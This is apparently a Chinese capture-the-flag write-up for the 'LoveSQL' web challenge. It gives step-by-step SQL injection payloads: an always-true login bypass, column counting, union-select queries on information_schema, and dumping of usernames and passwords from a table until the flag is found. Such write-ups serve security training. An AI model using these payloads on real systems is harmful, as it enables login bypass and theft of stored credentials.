web
第五题
[极客大挑战 2019]LoveSQL
打开靶场
查看源码有无帮助
发现check.php访问
这就是检查输入的源码,没有什么作用
直接尝试永真式进行登录
1' or 1=1 #
登陆成功并得到一串密文,进行解密尝试
尝试了很多解密都无法解出
更换方法尝试,既然存在注入,直接猜解字段数
1' order by 4 #
改成3
没有报错,说明有字段数为3
使用联合查询猜解回显点
1' union select 1,2,3 #
得到回显点为 2和3
查询数据库中的表名
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #
得到数据库中一共有2个表geekuser和l0ve1ysq1
根据上面登陆成功的页面,用户为admin,猜测登陆页面的查询来自geekuser表,猜测flag在l0ve1ysq1表中
对l0ve1ysq1表进行查询,查询列名
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1' #
emm…
l0ve1ysq1的字段为id,username,password。。可能猜错了
先查一下试试
1' union select 1,username,password from l0ve1ysq1 where id=1 #
继续查询id=2
id=3
4
5
6
7
8
9
…
终于。当我试到了第16个。。。。得到了flag
…
…